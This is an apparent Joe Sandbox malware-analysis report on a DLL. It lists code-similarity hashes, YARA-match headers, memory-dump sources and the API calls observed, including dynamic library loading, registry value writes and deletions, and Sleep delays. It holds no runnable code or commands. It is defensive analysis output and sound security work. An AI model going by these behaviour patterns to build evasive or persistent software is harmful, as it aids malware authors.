                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2687faa37309abc548b5ff328fe7a62011fc3d30ac3d746e604706c2c85b3cbe
                                                          • Instruction ID: 7bb6ed843fccb1d171a269f829f0da8c3387a7479521bb1172319b2c54a59b23
                                                          • Opcode Fuzzy Hash: 2687faa37309abc548b5ff328fe7a62011fc3d30ac3d746e604706c2c85b3cbe
                                                          • Instruction Fuzzy Hash: 60D155B5A057468FC314CF09C890A5AF7E1FFC8354F158A2EE8999B311D730E946CB92
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80c568206ee772c262ef29b3cb3411df1fba831bc70dbbdd959477f18782bbad
                                                          • Instruction ID: 191fb6512ce3fe81ac62e8b205ff347e08eb9b5354047abb2973186291256276
                                                          • Opcode Fuzzy Hash: 80c568206ee772c262ef29b3cb3411df1fba831bc70dbbdd959477f18782bbad
                                                          • Instruction Fuzzy Hash: 52D1AE64926B0296D716CF38D082436B3A2FFF27147A4C75ED886B715AFB30E895C381
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_5_2_10000000_loaddll32.jbxd): identical to the first entry above
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae47193ef76f41e1c0a7737ddabf261204965994b2c23791b9a9f3304ea2af50
                                                          • Instruction ID: 45ee19a05268406ed62398bc3a28ccd0e4e8b6f529426f227ce502e31306181e
                                                          • Opcode Fuzzy Hash: ae47193ef76f41e1c0a7737ddabf261204965994b2c23791b9a9f3304ea2af50
                                                          • Instruction Fuzzy Hash: 3BC135716087468FD71CCF19C89156AFBE2FFC8704F048A2EE59A87354EB34A914CB89
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44531fdb7ad762606b8c0ed8b22239f60f764cef16d5b4e10ce9907491eaaf73
                                                          • Instruction ID: 1cefddefc1273a83d4783cd2495db2e7edfb8caec8dc97b4bcf5608fb9fa9477
                                                          • Opcode Fuzzy Hash: 44531fdb7ad762606b8c0ed8b22239f60f764cef16d5b4e10ce9907491eaaf73
                                                          • Instruction Fuzzy Hash: 8DD18A756092518FC319CF28E8D88E67BE5FF98710B1E42F8C9898B323D731A985CB55
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e36b668c6f7f275d4e3c1909ff9ce4881944ec2a47434caefc73e7e0d96a4ec0
                                                          • Instruction ID: 721eaa63ce6458851d8aa1b9dc4c03e48d6a588ee79b546b769e2eb3cd3e4e7c
                                                          • Opcode Fuzzy Hash: e36b668c6f7f275d4e3c1909ff9ce4881944ec2a47434caefc73e7e0d96a4ec0
                                                          • Instruction Fuzzy Hash: 56C13E3560D3828FC308CF69C49055AFBE2BFCA208F49D97DE9D98B312D671A919CB45
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 380346d83fdc543ebc22177e3de29bc30f0f136880a3c99924b68710931819b8
                                                          • Instruction ID: ac40b97b19cf350deb4381199cebd45df556241ac8ef125ecfdd14d8ce777ac4
                                                          • Opcode Fuzzy Hash: 380346d83fdc543ebc22177e3de29bc30f0f136880a3c99924b68710931819b8
                                                          • Instruction Fuzzy Hash: 3CA1B334A087968FC709CF29848031ABBE2FFD9616F24C66DD8A58F299E771C905C781
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ba32ef62104ad4fa989df10cd095480fe71a6d544f4596f173a80f44f9302ff
                                                          • Instruction ID: 5f98526eac24df5b1521ed8c3c60a8dea648e96a9abcffbfabeff445296a397c
                                                          • Opcode Fuzzy Hash: 5ba32ef62104ad4fa989df10cd095480fe71a6d544f4596f173a80f44f9302ff
                                                          • Instruction Fuzzy Hash: 4EC18BA4A2AF0596D7168F38D482536B3A1FFF17147A4C74AD8C6B715EFB20E4A1D280
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 87cd360eeabfb3d2a53af9d4dc92188b2830e60fc760d83bb67fb1035d8072f3
                                                          • Instruction ID: 8d182b711f86b2590d44b9e897d1d1c98bcbef0953a52f6730e8bedf5447d214
                                                          • Opcode Fuzzy Hash: 87cd360eeabfb3d2a53af9d4dc92188b2830e60fc760d83bb67fb1035d8072f3
                                                          • Instruction Fuzzy Hash: F6916D32604B428FD729CF29C8914ABB7E2EF86344B69892DD5D787B11E731B849CB41
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
                                                          • Instruction ID: e70820d266a8dfc3c891c9c4e497ac63b67ceedcd589d3e7af91b45e671c8c89
                                                          • Opcode Fuzzy Hash: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
                                                          • Instruction Fuzzy Hash: FB718533755A8207E71CCE3E8C612BAABD38FC621432ED87E94DAC7756EC79D41A5204
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 526be129fac9b37650431431b4705c90b65478cca87c7015f6ccda0600b84cbe
                                                          • Instruction ID: ada8525b159845f1390d658ad0e5d9a57e75d79f439640740ceeb097215e61c0
                                                          • Opcode Fuzzy Hash: 526be129fac9b37650431431b4705c90b65478cca87c7015f6ccda0600b84cbe
                                                          • Instruction Fuzzy Hash: 3A9149756047059FD358CF28C881BABB7EAEBC8300F15992DF99A87340EA30F908CB51
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 738e318655c3b82810aac9401e85110b9a511d01cb2779d768fdfb1b57bd8194
                                                          • Instruction ID: 65d720aa07cd928deccfaa74b3b71696debaa1d146457c02c1e58d8034247ce2
                                                          • Opcode Fuzzy Hash: 738e318655c3b82810aac9401e85110b9a511d01cb2779d768fdfb1b57bd8194
                                                          • Instruction Fuzzy Hash: C8914A716093818FC318CF6DC89056AFBE2FFCE304F19863EE589C7365DA7599068A46
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 361d593a6597ca170d4028ccc48b8ee29c1db73e1bb6d68cc95f9e1a891fcec8
                                                          • Instruction ID: 394e96dab5a0ad22cad07a8418f847d0fe22322e10ef68398779eb1422000efd
                                                          • Opcode Fuzzy Hash: 361d593a6597ca170d4028ccc48b8ee29c1db73e1bb6d68cc95f9e1a891fcec8
                                                          • Instruction Fuzzy Hash: 4E81BF327195A64BE708CF29DCE053BB7A3EB8D340F19883DC686D7356C931A91AC760
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 763eac6b6b42709351b1268c3bfac75d101506b380c3a22d1c78b889bc5400ed
                                                          • Instruction ID: 4e5fd15620c05232e311bf08b0a4888acbdfcfc8b05760d64ecdd7d941a19f93
                                                          • Opcode Fuzzy Hash: 763eac6b6b42709351b1268c3bfac75d101506b380c3a22d1c78b889bc5400ed
                                                          • Instruction Fuzzy Hash: 67219373BF4E1B0EE344A9FCDC4A7A135C1D3A4715F198E38A119C72C0F5ACCA885250

                                                          Control-flow Graph

                                                          APIs
                                                          • atoi.MSVCRT(?), ref: 10025E9A
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                            • Part of subcall function 10014CA0: RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,ExA,0000004D), ref: 10014DD4
                                                            • Part of subcall function 10014CA0: RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,?), ref: 10014DFE
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • atoi.MSVCRT(?,80000002,?,?,00000004,?,00000000,00000000,00000000), ref: 10026908
                                                            • Part of subcall function 10014CA0: RegDeleteKeyA.ADVAPI32(?,?), ref: 10014E2A
                                                          • Sleep.KERNEL32(000005DC), ref: 10026933
                                                            • Part of subcall function 10014CA0: RegDeleteValueA.ADVAPI32(?,?), ref: 10014E56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcValue$#823Deleteatoi$Sleep
                                                          • String ID: $ $ $ $ $ $-$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$E$E$E$E$E$E$M$M$M$M$M$M$N$P$P$P$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$W$W$Y$Y$Y$Y$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$a$a$a$a$a$a$a$b$c$c$c$c$d$d$d$d$f$i$i$i$i$i$i$i$i$i$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$s$s$s$s$u$u$u$u$u$v$v$v$v$v$v$w$y
                                                          • API String ID: 3245547908-431623420
                                                          • Opcode ID: 6ddffa8ede800b22b0c7d31f1a98932fe5aee7fc99250002329de52fbb2c0142
                                                          • Instruction ID: 46da3d8f85b41806bff36dc6f8e690e7e2fa6d6d5cef91b77a25e2a54a4f965e
                                                          • Opcode Fuzzy Hash: 6ddffa8ede800b22b0c7d31f1a98932fe5aee7fc99250002329de52fbb2c0142
                                                          • Instruction Fuzzy Hash: 70524C2154D7C0DDE332C6689859BDBBED21BB3709F48489D92DC1B283C2BA4658C77B

                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • LoadLibraryA.KERNEL32 ref: 1001BA99
                                                          • GetProcAddress.KERNEL32 ref: 1001BB65
                                                          • GetProcAddress.KERNEL32 ref: 1001BDDC
                                                          • GetCurrentProcess.KERNEL32 ref: 1001BE73
                                                          • Sleep.KERNEL32(00000014), ref: 1001BEC5
                                                          • Sleep.KERNEL32(000003E8), ref: 1001BF4C
                                                          • CloseHandle.KERNEL32(?), ref: 1001BF9F
                                                          • CloseHandle.KERNEL32(?), ref: 1001BFBC
                                                          • CloseHandle.KERNEL32(?), ref: 1001BFC7
                                                          • CloseHandle.KERNEL32(?), ref: 1001BFD5
                                                          • FreeLibrary.KERNEL32(00000000), ref: 1001BFDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Handle$Close$AddressLibraryProc$LoadSleep$CurrentFreeModuleProcess
                                                          • String ID: .$.$.$2$2$2$3$3$3$A$A$A$A$A$A$B$B$C$C$D$D$D$D$E$E$E$E$E$E$G$I$I$I$K$L$N$N$O$P$P$P$P$Q$R$R$S$S$S$S$S$T$T$T$T$T$T$U$U$U$V$V$W$W$W$a$a$c$c$c$c$c$c$d$d$d$d$i$i$i$i$i$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$u$u$v$v$v$y$y
                                                          • API String ID: 2138834447-1109127159
                                                          • Opcode ID: b9e704f251a0a837cde59a2c11b08c75fae4c7d90ebe148694494241e37c1652
                                                          • Instruction ID: 269a079fabb6e471e22dbf985f9d891cedc7cb7e94f45f69aca70680d2f295ee
                                                          • Opcode Fuzzy Hash: b9e704f251a0a837cde59a2c11b08c75fae4c7d90ebe148694494241e37c1652
                                                          • Instruction Fuzzy Hash: D432AF6040C7C4C9E332C7688848BDBBFD66BA6748F08499DE2CC4B282C7BA5558C777
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 10005D3C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D45
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetPrivateProfileSectionNamesA), ref: 10005D55
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D58
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetPrivateProfileStringA), ref: 10005D6B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D6E
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetWindowsDirectoryA), ref: 10005D81
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D84
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 10005D94
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D97
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 10005DA7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005DAA
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 10005DBD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005DC0
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcmpA), ref: 10005DD3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005DD6
                                                          • strchr.MSVCRT ref: 100060F0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10006131
                                                          • wsprintfA.USER32 ref: 10006151
                                                          • #823.MFC42(00001000), ref: 100061B3
                                                          • #825.MFC42(?,?,?,00000000,?,?,00000000,?,?), ref: 1000638B
                                                          • #825.MFC42(00000000,?,?,?,00000000,?,?,00000000,?,?), ref: 10006391
                                                          • #825.MFC42(00000000,00000000,?,?,?,00000000,?,?,00000000,?,?), ref: 10006397
                                                          • #825.MFC42(00000000), ref: 100063DD
                                                            • Part of subcall function 10005A50: LoadLibraryA.KERNEL32 ref: 10005AA7
